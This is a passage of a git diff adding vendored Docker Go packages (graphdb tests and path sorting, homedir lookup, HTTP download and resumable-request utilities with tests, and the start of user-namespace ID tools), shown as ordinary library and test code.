func(p string, e *Entity) error { + t.Logf("Path: %s Entity: %s", p, e.ID()) + return nil + }, -1); err != nil { + t.Fatal(err) + } +} + +func TestGetEntityByPath(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/db/logs", child4.ID()); err != nil { + t.Fatal(err) + } + + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + child5, err := db.Set("/gograph", "5") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { + t.Fatal(err) + } + + entity := db.Get("/webapp/db/logs") + if entity == nil { + t.Fatal("Entity should not be nil") + } + if entity.ID() != "4" { + t.Fatalf("Expected to get entity with id 4, got %s", entity.ID()) + } +} + +func TestEnitiesPaths(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/db/logs", child4.ID()); err != nil { + t.Fatal(err) + } + + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + child5, err := db.Set("/gograph", "5") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { + t.Fatal(err) + } + + out := db.List("/", -1) + for _, p := range out.Paths() { + t.Log(p) + } +} + +func TestDeleteRootEntity(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + if err := db.Delete("/"); err == nil { + t.Fatal("Error should not be nil") + } +} + +func TestDeleteEntity(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + _, err := db.Set("/webapp", "1") + if err != nil { + t.Fatal(err) + } + child2, err := db.Set("/db", "2") + if err != nil { + t.Fatal(err) + } + child4, err := db.Set("/logs", "4") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/db/logs", child4.ID()); err != nil { + t.Fatal(err) + } + + child3, err := db.Set("/sentry", "3") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/db", child2.ID()); err != nil { + t.Fatal(err) + } + + child5, err := db.Set("/gograph", "5") + if err != nil { + t.Fatal(err) + } + if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { + t.Fatal(err) + } + + if err := db.Delete("/webapp/sentry"); err != nil { + t.Fatal(err) + } + entity := db.Get("/webapp/sentry") + if entity != nil { + t.Fatal("Entity /webapp/sentry should be nil") + } +} + +func TestCountRefs(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + + if db.Refs("1") != 1 { + t.Fatal("Expect reference count to be 1") + } + + db.Set("/db", "2") + db.Set("/webapp/db", "2") + if db.Refs("2") != 2 { + t.Fatal("Expect reference count to be 2") + } +} + +func TestPurgeId(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + + if c := db.Refs("1"); c != 1 { + t.Fatalf("Expect reference count to be 1, got %d", c) + } + + db.Set("/db", "2") + db.Set("/webapp/db", "2") + + count, err := db.Purge("2") + if err != nil { + t.Fatal(err) + } + if count != 2 { + t.Fatalf("Expected 2 references to be removed, got %d", count) + } +} + +// Regression test https://github.com/docker/docker/issues/12334 +func TestPurgeIdRefPaths(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + db.Set("/db", "2") + + db.Set("/db/webapp", "1") + + if c := db.Refs("1"); c != 2 { + t.Fatalf("Expected 2 reference for webapp, got %d", c) + } + if c := db.Refs("2"); c != 1 { + t.Fatalf("Expected 1 reference for db, got %d", c) + } + + if rp := db.RefPaths("2"); len(rp) != 1 { + t.Fatalf("Expected 1 reference path for db, got %d", len(rp)) + } + + count, err := db.Purge("2") + if err != nil { + t.Fatal(err) + } + + if count != 2 { + t.Fatalf("Expected 2 rows to be removed, got %d", count) + } + + if c := db.Refs("2"); c != 0 { + t.Fatalf("Expected 0 reference for db, got %d", c) + } + if c := db.Refs("1"); c != 1 { + t.Fatalf("Expected 1 reference for webapp, got %d", c) + } +} + +func TestRename(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + + if db.Refs("1") != 1 { + t.Fatal("Expect reference count to be 1") + } + + db.Set("/db", "2") + db.Set("/webapp/db", "2") + + if db.Get("/webapp/db") == nil { + t.Fatal("Cannot find entity at path /webapp/db") + } + + if err := db.Rename("/webapp/db", "/webapp/newdb"); err != nil { + t.Fatal(err) + } + if db.Get("/webapp/db") != nil { + t.Fatal("Entity should not exist at /webapp/db") + } + if db.Get("/webapp/newdb") == nil { + t.Fatal("Cannot find entity at path /webapp/newdb") + } + +} + +func TestCreateMultipleNames(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/db", "1") + if _, err := db.Set("/myapp", "1"); err != nil { + t.Fatal(err) + } + + db.Walk("/", func(p string, e *Entity) error { + t.Logf("%s\n", p) + return nil + }, -1) +} + +func TestRefPaths(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/webapp", "1") + + db.Set("/db", "2") + db.Set("/webapp/db", "2") + + refs := db.RefPaths("2") + if len(refs) != 2 { + t.Fatalf("Expected reference count to be 2, got %d", len(refs)) + } +} + +func TestExistsTrue(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/testing", "1") + + if !db.Exists("/testing") { + t.Fatalf("/tesing should exist") + } +} + +func TestExistsFalse(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/toerhe", "1") + + if db.Exists("/testing") { + t.Fatalf("/tesing should not exist") + } + +} + +func TestGetNameWithTrailingSlash(t *testing.T) { + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + db.Set("/todo", "1") + + e := db.Get("/todo/") + if e == nil { + t.Fatalf("Entity should not be nil") + } +} + +func TestConcurrentWrites(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + db, dbpath := newTestDb(t) + defer destroyTestDb(dbpath) + + errs := make(chan error, 2) + + save := func(name string, id string) { + if _, err := db.Set(fmt.Sprintf("/%s", name), id); err != nil { + errs <- err + } + errs <- nil + } + purge := func(id string) { + if _, err := db.Purge(id); err != nil { + errs <- err + } + errs <- nil + } + + save("/1", "1") + + go purge("1") + go save("/2", "2") + + any := false + for i := 0; i < 2; i++ { + if err := <-errs; err != nil { + any = true + t.Log(err) + } + } + if any { + t.Fail() + } +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go new file mode 100644 index 0000000000..c07df077d8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go @@ -0,0 +1,27 @@ +package graphdb + +import "sort" + +type pathSorter struct { + paths []string + by func(i, j string) bool +} + +func sortByDepth(paths []string) { + s := &pathSorter{paths, func(i, j string) bool { + return PathDepth(i) > PathDepth(j) + }} + sort.Sort(s) +} + +func (s *pathSorter) Len() int { + return len(s.paths) +} + +func (s *pathSorter) Swap(i, j int) { + s.paths[i], s.paths[j] = s.paths[j], s.paths[i] +} + +func (s *pathSorter) Less(i, j int) bool { + return s.by(s.paths[i], s.paths[j]) +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go new file mode 100644 index 0000000000..ddf2266f60 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go @@ -0,0 +1,29 @@ +package graphdb + +import ( + "testing" +) + +func TestSort(t *testing.T) { + paths := []string{ + "/", + "/myreallylongname", + "/app/db", + } + + sortByDepth(paths) + + if len(paths) != 3 { + t.Fatalf("Expected 3 parts got %d", len(paths)) + } + + if paths[0] != "/app/db" { + t.Fatalf("Expected /app/db got %s", paths[0]) + } + if paths[1] != "/myreallylongname" { + t.Fatalf("Expected /myreallylongname got %s", paths[1]) + } + if paths[2] != "/" { + t.Fatalf("Expected / got %s", paths[2]) + } +} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go b/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go new file mode 100644 index 0000000000..2b8ba71724 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go @@ -0,0 +1,3 @@ +// +build !cgo !linux + +package graphdb diff --git a/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go new file mode 100644 index 0000000000..9edd79c35e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go @@ -0,0 +1,32 @@ +package graphdb + +import ( + "path" + "strings" +) + +// Split p on / +func split(p string) []string { + return strings.Split(p, "/") +} + +// PathDepth returns the depth or number of / in a given path +func PathDepth(p string) int { + parts := split(p) + if len(parts) == 2 && parts[1] == "" { + return 1 + } + return len(parts) +} + +func splitPath(p string) (parent, name string) { + if p[0] != '/' { + p = "/" + p + } + parent, name = path.Split(p) + l := len(parent) + if parent[l-1] == '/' { + parent = parent[:l-1] + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir.go b/vendor/github.com/docker/docker/pkg/homedir/homedir.go new file mode 100644 index 0000000000..8154e83f0c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir.go @@ -0,0 +1,39 @@ +package homedir + +import ( + "os" + "runtime" + + "github.com/opencontainers/runc/libcontainer/user" +) + +// Key returns the env var name for the user's home dir based on +// the platform being run on +func Key() string { + if runtime.GOOS == "windows" { + return "USERPROFILE" + } + return "HOME" +} + +// Get returns the home directory of the current user with the help of +// environment variables depending on the target operating system. +// Returned path should be used with "path/filepath" to form new paths. +func Get() string { + home := os.Getenv(Key()) + if home == "" && runtime.GOOS != "windows" { + if u, err := user.CurrentUser(); err == nil { + return u.Home + } + } + return home +} + +// GetShortcutString returns the string that is shortcut to user's home directory +// in the native shell of the platform running on. +func GetShortcutString() string { + if runtime.GOOS == "windows" { + return "%USERPROFILE%" // be careful while using in format functions + } + return "~" +} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go new file mode 100644 index 0000000000..7a95cb2bd7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go @@ -0,0 +1,24 @@ +package homedir + +import ( + "path/filepath" + "testing" +) + +func TestGet(t *testing.T) { + home := Get() + if home == "" { + t.Fatal("returned home directory is empty") + } + + if !filepath.IsAbs(home) { + t.Fatalf("returned path is not absolute: %s", home) + } +} + +func TestGetShortcutString(t *testing.T) { + shortcut := GetShortcutString() + if shortcut == "" { + t.Fatal("returned shortcut string is empty") + } +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils.go b/vendor/github.com/docker/docker/pkg/httputils/httputils.go new file mode 100644 index 0000000000..d7dc43877d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/httputils.go @@ -0,0 +1,56 @@ +package httputils + +import ( + "errors" + "fmt" + "net/http" + "regexp" + "strings" + + "github.com/docker/docker/pkg/jsonmessage" +) + +var ( + headerRegexp = regexp.MustCompile(`^(?:(.+)/(.+?))\((.+)\).*$`) + errInvalidHeader = errors.New("Bad header, should be in format `docker/version (platform)`") +) + +// Download requests a given URL and returns an io.Reader. +func Download(url string) (resp *http.Response, err error) { + if resp, err = http.Get(url); err != nil { + return nil, err + } + if resp.StatusCode >= 400 { + return nil, fmt.Errorf("Got HTTP status code >= 400: %s", resp.Status) + } + return resp, nil +} + +// NewHTTPRequestError returns a JSON response error. +func NewHTTPRequestError(msg string, res *http.Response) error { + return &jsonmessage.JSONError{ + Message: msg, + Code: res.StatusCode, + } +} + +// ServerHeader contains the server information. +type ServerHeader struct { + App string // docker + Ver string // 1.8.0-dev + OS string // windows or linux +} + +// ParseServerHeader extracts pieces from an HTTP server header +// which is in the format "docker/version (os)" eg docker/1.8.0-dev (windows). +func ParseServerHeader(hdr string) (*ServerHeader, error) { + matches := headerRegexp.FindStringSubmatch(hdr) + if len(matches) != 4 { + return nil, errInvalidHeader + } + return &ServerHeader{ + App: strings.TrimSpace(matches[1]), + Ver: strings.TrimSpace(matches[2]), + OS: strings.TrimSpace(matches[3]), + }, nil +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go b/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go new file mode 100644 index 0000000000..d35d082156 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go @@ -0,0 +1,115 @@ +package httputils + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "strings" + "testing" +) + +func TestDownload(t *testing.T) { + expected := "Hello, docker !" + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintf(w, expected) + })) + defer ts.Close() + response, err := Download(ts.URL) + if err != nil { + t.Fatal(err) + } + + actual, err := ioutil.ReadAll(response.Body) + response.Body.Close() + + if err != nil || string(actual) != expected { + t.Fatalf("Expected the response %q, got err:%v, response:%v, actual:%s", expected, err, response, string(actual)) + } +} + +func TestDownload400Errors(t *testing.T) { + expectedError := "Got HTTP status code >= 400: 403 Forbidden" + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // 403 + http.Error(w, "something failed (forbidden)", http.StatusForbidden) + })) + defer ts.Close() + // Expected status code = 403 + if _, err := Download(ts.URL); err == nil || err.Error() != expectedError { + t.Fatalf("Expected the the error %q, got %v", expectedError, err) + } +} + +func TestDownloadOtherErrors(t *testing.T) { + if _, err := Download("I'm not an url.."); err == nil || !strings.Contains(err.Error(), "unsupported protocol scheme") { + t.Fatalf("Expected an error with 'unsupported protocol scheme', got %v", err) + } +} + +func TestNewHTTPRequestError(t *testing.T) { + errorMessage := "Some error message" + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // 403 + http.Error(w, errorMessage, http.StatusForbidden) + })) + defer ts.Close() + httpResponse, err := http.Get(ts.URL) + if err != nil { + t.Fatal(err) + } + if err := NewHTTPRequestError(errorMessage, httpResponse); err.Error() != errorMessage { + t.Fatalf("Expected err to be %q, got %v", errorMessage, err) + } +} + +func TestParseServerHeader(t *testing.T) { + inputs := map[string][]string{ + "bad header": {"error"}, + "(bad header)": {"error"}, + "(without/spaces)": {"error"}, + "(header/with spaces)": {"error"}, + "foo/bar (baz)": {"foo", "bar", "baz"}, + "foo/bar": {"error"}, + "foo": {"error"}, + "foo/bar (baz space)": {"foo", "bar", "baz space"}, + " f f / b b ( b s ) ": {"f f", "b b", "b s"}, + "foo/bar (baz) ignore": {"foo", "bar", "baz"}, + "foo/bar ()": {"error"}, + "foo/bar()": {"error"}, + "foo/bar(baz)": {"foo", "bar", "baz"}, + "foo/bar/zzz(baz)": {"foo/bar", "zzz", "baz"}, + "foo/bar(baz/abc)": {"foo", "bar", "baz/abc"}, + "foo/bar(baz (abc))": {"foo", "bar", "baz (abc)"}, + } + + for header, values := range inputs { + serverHeader, err := ParseServerHeader(header) + if err != nil { + if err != errInvalidHeader { + t.Fatalf("Failed to parse %q, and got some unexpected error: %q", header, err) + } + if values[0] == "error" { + continue + } + t.Fatalf("Header %q failed to parse when it shouldn't have", header) + } + if values[0] == "error" { + t.Fatalf("Header %q parsed ok when it should have failed(%q).", header, serverHeader) + } + + if serverHeader.App != values[0] { + t.Fatalf("Expected serverHeader.App for %q to equal %q, got %q", header, values[0], serverHeader.App) + } + + if serverHeader.Ver != values[1] { + t.Fatalf("Expected serverHeader.Ver for %q to equal %q, got %q", header, values[1], serverHeader.Ver) + } + + if serverHeader.OS != values[2] { + t.Fatalf("Expected serverHeader.OS for %q to equal %q, got %q", header, values[2], serverHeader.OS) + } + + } + +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype.go b/vendor/github.com/docker/docker/pkg/httputils/mimetype.go new file mode 100644 index 0000000000..d5cf34e4f2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/mimetype.go @@ -0,0 +1,30 @@ +package httputils + +import ( + "mime" + "net/http" +) + +// MimeTypes stores the MIME content type. +var MimeTypes = struct { + TextPlain string + Tar string + OctetStream string +}{"text/plain", "application/tar", "application/octet-stream"} + +// DetectContentType returns a best guess representation of the MIME +// content type for the bytes at c. The value detected by +// http.DetectContentType is guaranteed not be nil, defaulting to +// application/octet-stream when a better guess cannot be made. The +// result of this detection is then run through mime.ParseMediaType() +// which separates the actual MIME string from any parameters. +func DetectContentType(c []byte) (string, map[string]string, error) { + + ct := http.DetectContentType(c) + contentType, args, err := mime.ParseMediaType(ct) + if err != nil { + return "", nil, err + } + + return contentType, args, nil +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go b/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go new file mode 100644 index 0000000000..9de433ee8c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go @@ -0,0 +1,13 @@ +package httputils + +import ( + "testing" +) + +func TestDetectContentType(t *testing.T) { + input := []byte("That is just a plain text") + + if contentType, _, err := DetectContentType(input); err != nil || contentType != "text/plain" { + t.Errorf("TestDetectContentType failed") + } +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go new file mode 100644 index 0000000000..bebc8608cd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go @@ -0,0 +1,95 @@ +package httputils + +import ( + "fmt" + "io" + "net/http" + "time" + + "github.com/Sirupsen/logrus" +) + +type resumableRequestReader struct { + client *http.Client + request *http.Request + lastRange int64 + totalSize int64 + currentResponse *http.Response + failures uint32 + maxFailures uint32 +} + +// ResumableRequestReader makes it possible to resume reading a request's body transparently +// maxfail is the number of times we retry to make requests again (not resumes) +// totalsize is the total length of the body; auto detect if not provided +func ResumableRequestReader(c *http.Client, r *http.Request, maxfail uint32, totalsize int64) io.ReadCloser { + return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize} +} + +// ResumableRequestReaderWithInitialResponse makes it possible to resume +// reading the body of an already initiated request. +func ResumableRequestReaderWithInitialResponse(c *http.Client, r *http.Request, maxfail uint32, totalsize int64, initialResponse *http.Response) io.ReadCloser { + return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, currentResponse: initialResponse} +} + +func (r *resumableRequestReader) Read(p []byte) (n int, err error) { + if r.client == nil || r.request == nil { + return 0, fmt.Errorf("client and request can't be nil\n") + } + isFreshRequest := false + if r.lastRange != 0 && r.currentResponse == nil { + readRange := fmt.Sprintf("bytes=%d-%d", r.lastRange, r.totalSize) + r.request.Header.Set("Range", readRange) + time.Sleep(5 * time.Second) + } + if r.currentResponse == nil { + r.currentResponse, err = r.client.Do(r.request) + isFreshRequest = true + } + if err != nil && r.failures+1 != r.maxFailures { + r.cleanUpResponse() + r.failures++ + time.Sleep(5 * time.Duration(r.failures) * time.Second) + return 0, nil + } else if err != nil { + r.cleanUpResponse() + return 0, err + } + if r.currentResponse.StatusCode == 416 && r.lastRange == r.totalSize && r.currentResponse.ContentLength == 0 { + r.cleanUpResponse() + return 0, io.EOF + } else if r.currentResponse.StatusCode != 206 && r.lastRange != 0 && isFreshRequest { + r.cleanUpResponse() + return 0, fmt.Errorf("the server doesn't support byte ranges") + } + if r.totalSize == 0 { + r.totalSize = r.currentResponse.ContentLength + } else if r.totalSize <= 0 { + r.cleanUpResponse() + return 0, fmt.Errorf("failed to auto detect content length") + } + n, err = r.currentResponse.Body.Read(p) + r.lastRange += int64(n) + if err != nil { + r.cleanUpResponse() + } + if err != nil && err != io.EOF { + logrus.Infof("encountered error during pull and clearing it before resume: %s", err) + err = nil + } + return n, err +} + +func (r *resumableRequestReader) Close() error { + r.cleanUpResponse() + r.client = nil + r.request = nil + return nil +} + +func (r *resumableRequestReader) cleanUpResponse() { + if r.currentResponse != nil { + r.currentResponse.Body.Close() + r.currentResponse = nil + } +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go new file mode 100644 index 0000000000..5a2906db77 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go @@ -0,0 +1,307 @@ +package httputils + +import ( + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "strings" + "testing" +) + +func TestResumableRequestHeaderSimpleErrors(t *testing.T) { + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintln(w, "Hello, world !") + })) + defer ts.Close() + + client := &http.Client{} + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + expectedError := "client and request can't be nil\n" + resreq := &resumableRequestReader{} + _, err = resreq.Read([]byte{}) + if err == nil || err.Error() != expectedError { + t.Fatalf("Expected an error with '%s', got %v.", expectedError, err) + } + + resreq = &resumableRequestReader{ + client: client, + request: req, + totalSize: -1, + } + expectedError = "failed to auto detect content length" + _, err = resreq.Read([]byte{}) + if err == nil || err.Error() != expectedError { + t.Fatalf("Expected an error with '%s', got %v.", expectedError, err) + } + +} + +// Not too much failures, bails out after some wait +func TestResumableRequestHeaderNotTooMuchFailures(t *testing.T) { + client := &http.Client{} + + var badReq *http.Request + badReq, err := http.NewRequest("GET", "I'm not an url", nil) + if err != nil { + t.Fatal(err) + } + + resreq := &resumableRequestReader{ + client: client, + request: badReq, + failures: 0, + maxFailures: 2, + } + read, err := resreq.Read([]byte{}) + if err != nil || read != 0 { + t.Fatalf("Expected no error and no byte read, got err:%v, read:%v.", err, read) + } +} + +// Too much failures, returns the error +func TestResumableRequestHeaderTooMuchFailures(t *testing.T) { + client := &http.Client{} + + var badReq *http.Request + badReq, err := http.NewRequest("GET", "I'm not an url", nil) + if err != nil { + t.Fatal(err) + } + + resreq := &resumableRequestReader{ + client: client, + request: badReq, + failures: 0, + maxFailures: 1, + } + defer resreq.Close() + + expectedError := `Get I%27m%20not%20an%20url: unsupported protocol scheme ""` + read, err := resreq.Read([]byte{}) + if err == nil || err.Error() != expectedError || read != 0 { + t.Fatalf("Expected the error '%s', got err:%v, read:%v.", expectedError, err, read) + } +} + +type errorReaderCloser struct{} + +func (errorReaderCloser) Close() error { return nil } + +func (errorReaderCloser) Read(p []byte) (n int, err error) { + return 0, fmt.Errorf("An error occurred") +} + +// If an unknown error is encountered, return 0, nil and log it +func TestResumableRequestReaderWithReadError(t *testing.T) { + var req *http.Request + req, err := http.NewRequest("GET", "", nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + + response := &http.Response{ + Status: "500 Internal Server", + StatusCode: 500, + ContentLength: 0, + Close: true, + Body: errorReaderCloser{}, + } + + resreq := &resumableRequestReader{ + client: client, + request: req, + currentResponse: response, + lastRange: 1, + totalSize: 1, + } + defer resreq.Close() + + buf := make([]byte, 1) + read, err := resreq.Read(buf) + if err != nil { + t.Fatal(err) + } + + if read != 0 { + t.Fatalf("Expected to have read nothing, but read %v", read) + } +} + +func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) { + var req *http.Request + req, err := http.NewRequest("GET", "", nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + + response := &http.Response{ + Status: "416 Requested Range Not Satisfiable", + StatusCode: 416, + ContentLength: 0, + Close: true, + Body: ioutil.NopCloser(strings.NewReader("")), + } + + resreq := &resumableRequestReader{ + client: client, + request: req, + currentResponse: response, + lastRange: 1, + totalSize: 1, + } + defer resreq.Close() + + buf := make([]byte, 1) + _, err = resreq.Read(buf) + if err == nil || err != io.EOF { + t.Fatalf("Expected an io.EOF error, got %v", err) + } +} + +func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) { + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + if r.Header.Get("Range") == "" { + t.Fatalf("Expected a Range HTTP header, got nothing") + } + })) + defer ts.Close() + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + + resreq := &resumableRequestReader{ + client: client, + request: req, + lastRange: 1, + } + defer resreq.Close() + + buf := make([]byte, 2) + _, err = resreq.Read(buf) + if err == nil || err.Error() != "the server doesn't support byte ranges" { + t.Fatalf("Expected an error 'the server doesn't support byte ranges', got %v", err) + } +} + +func TestResumableRequestReaderWithZeroTotalSize(t *testing.T) { + + srvtxt := "some response text data" + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintln(w, srvtxt) + })) + defer ts.Close() + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + retries := uint32(5) + + resreq := ResumableRequestReader(client, req, retries, 0) + defer resreq.Close() + + data, err := ioutil.ReadAll(resreq) + if err != nil { + t.Fatal(err) + } + + resstr := strings.TrimSuffix(string(data), "\n") + + if resstr != srvtxt { + t.Errorf("resstr != srvtxt") + } +} + +func TestResumableRequestReader(t *testing.T) { + + srvtxt := "some response text data" + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintln(w, srvtxt) + })) + defer ts.Close() + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + retries := uint32(5) + imgSize := int64(len(srvtxt)) + + resreq := ResumableRequestReader(client, req, retries, imgSize) + defer resreq.Close() + + data, err := ioutil.ReadAll(resreq) + if err != nil { + t.Fatal(err) + } + + resstr := strings.TrimSuffix(string(data), "\n") + + if resstr != srvtxt { + t.Errorf("resstr != srvtxt") + } +} + +func TestResumableRequestReaderWithInitialResponse(t *testing.T) { + + srvtxt := "some response text data" + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + fmt.Fprintln(w, srvtxt) + })) + defer ts.Close() + + var req *http.Request + req, err := http.NewRequest("GET", ts.URL, nil) + if err != nil { + t.Fatal(err) + } + + client := &http.Client{} + retries := uint32(5) + imgSize := int64(len(srvtxt)) + + res, err := client.Do(req) + if err != nil { + t.Fatal(err) + } + + resreq := ResumableRequestReaderWithInitialResponse(client, req, retries, imgSize, res) + defer resreq.Close() + + data, err := ioutil.ReadAll(resreq) + if err != nil { + t.Fatal(err) + } + + resstr := strings.TrimSuffix(string(data), "\n") + + if resstr != srvtxt { + t.Errorf("resstr != srvtxt") + } +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools.go b/vendor/github.com/docker/docker/pkg/idtools/idtools.go new file mode 100644 index 0000000000..6bca466286 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools.go @@ -0,0 +1,197 @@ +package idtools + +import ( + "bufio" + "fmt" + "os" + "sort" + "strconv" + "strings" +) + +// IDMap contains a single entry for user namespace range remapping. An array +// of IDMap entries represents the structure that will be provided to the Linux +// kernel for creating a user namespace. +type IDMap struct { + ContainerID int `json:"container_id"` + HostID int `json:"host_id"` + Size int `json:"size"` +} + +type subIDRange struct { + Start int + Length int +} + +type ranges []subIDRange + +func (e ranges) Len() int { return len(e) } +func (e ranges) Swap(i, j int) { e[i], e[j] = e[j], e[i] } +func (e ranges) Less(i, j int) bool { return e[i].Start < e[j].Start } + +const ( + subuidFileName string = "/etc/subuid" + subgidFileName string = "/etc/subgid" +) + +// MkdirAllAs creates a directory (include any along the path) and then modifies +// ownership to the requested uid/gid. If the directory already exists, this +// function will still change ownership to the requested uid/gid pair. +func MkdirAllAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { + return mkdirAs(path, mode, ownerUID, ownerGID, true, true) +} + +// MkdirAllNewAs creates a directory (include any along the path) and then 